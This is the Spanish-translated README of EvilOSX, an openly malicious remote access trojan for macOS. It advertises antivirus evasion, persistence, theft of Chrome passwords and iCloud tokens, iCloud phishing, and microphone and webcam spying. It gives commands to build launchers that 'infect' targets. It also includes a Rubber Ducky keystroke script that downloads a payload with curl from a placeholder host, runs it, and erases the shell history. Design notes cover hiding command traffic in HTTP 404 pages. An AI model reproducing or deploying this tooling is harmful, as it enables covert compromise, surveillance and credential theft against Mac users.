EvilOSX
Un RAT malicioso (Herramienta de Administración Remota) para macOS / OS X.
Generador de Macros por Cedric Owens
Este proyecto ya no está activo
Características
- Emular una instancia de terminal
- Sistema de módulos simple y extensible
- Sin dependencias de bot (Python puro)
- No detectado por antivirus (cargas útiles cifradas con OpenSSL AES-256)
- Persistente
- Soporte para GUI y CLI
- Recuperar contraseñas de Chrome
- Recuperar tokens y contactos de iCloud
- Recuperar/monitorear el portapapeles
- Recuperar historial del navegador (Chrome y Safari)
- Phishing para contraseñas de iCloud a través de iTunes
- Enumeración de respaldos de iTunes (iOS)
- Grabar el micrófono
- Tomar una captura de pantalla o foto usando la cámara web
- Intentar obtener root mediante escalada de privilegios local
Cómo Usar
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX
# Go into the repository
$ cd EvilOSX
# Install dependencies required by the server
$ sudo pip install -r requirements.txt
# Start the GUI
$ python start.py
# Lastly, run a built launcher on your target(s)
Advertencia: Debido a que las cargas útiles se crean de forma única para el sistema objetivo (automáticamente por el servidor), el servidor debe estar ejecutándose cuando cualquier bot se conecte por primera vez.
Usuarios avanzados
También hay una CLI para aquellos que quieran usar esto sobre SSH:
# Create a launcher to infect your target(s)
$ python start.py --builder
# Start the CLI
$ python start.py --cli --port 1337
# Lastly, run a built launcher on your target(s)
Capturas de Pantalla

Motivación
Este proyecto fue creado para usarse con mi Rubber Ducky, aquí está el script simple:
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/
DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500
REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER
STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
- Tarda unos 10 segundos en comprometer cualquier Mac desbloqueada, lo cual es...... agradable
- Terminal está escrito así intencionalmente, en algunos sistemas Spotlight no encontrará la terminal de otra manera.
- Para omitir el asistente de configuración del teclado, asegúrese de cambiar el VID&PID que se puede encontrar aquí.
El teclado de aluminio (ISO) es probablemente el que está buscando.
Versionado
EvilOSX se mantendrá bajo las guías de Versionado Semántico tanto como sea posible.
Los lanzamientos del servidor y del bot se numerarán con el siguiente formato:
Y se construirán con las siguientes pautas:
- La ruptura de compatibilidad hacia atrás (con bots antiguos) incrementa la versión mayor
- Nuevas adiciones sin romper la compatibilidad hacia atrás incrementan la versión menor
- Correcciones de errores y cambios varios incrementan el parche
Para más información sobre SemVer, visite https://semver.org/.
Notas de Diseño
- Infectar una máquina se divide en tres partes:
- Un lanzador se ejecuta en la máquina objetivo cuyo único objetivo es ejecutar el stager
- El stager solicita al servidor un cargador que maneja cómo se cargará una carga útil
- Al cargador se le da una carga útil cifrada de forma única y luego se envía de vuelta al stager
- El servidor oculta sus comunicaciones enviando mensajes ocultos en páginas de error HTTP 404 (de la charla de BlackHat "Hiding In Plain Sight")
- Las solicitudes de comandos se recuperan del servidor a través de una solicitud GET
- Las respuestas de comandos se envían al servidor a través de una solicitud POST
- Los módulos aprovechan la naturaleza dinámica de Python; simplemente se envían a través de la red comprimidos con zlib, junto con cualquier opción de configuración
- Dado que el bot solo se comunica con el servidor y nunca al revés, el servidor no tiene forma de saber cuándo un bot se desconecta
Problemas
No dude en enviar cualquier problema o solicitud de función aquí.
Contribuciones
Para una guía simple sobre cómo crear módulos, haga clic aquí.
Créditos
- El increíble proyecto Empire
- Un saludo a Patrick Wardle por sus increíbles charlas, visite Objective-See
- manwhoami por sus proyectos: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts
(ahora eliminados... avísame si reapareces)
- El módulo slowloris está prácticamente copiado de PySlowLoris
- urwid y este código que me ahorraron mucho tiempo con la CLI
- Logotipo creado por motusora
Licencia
GPLv3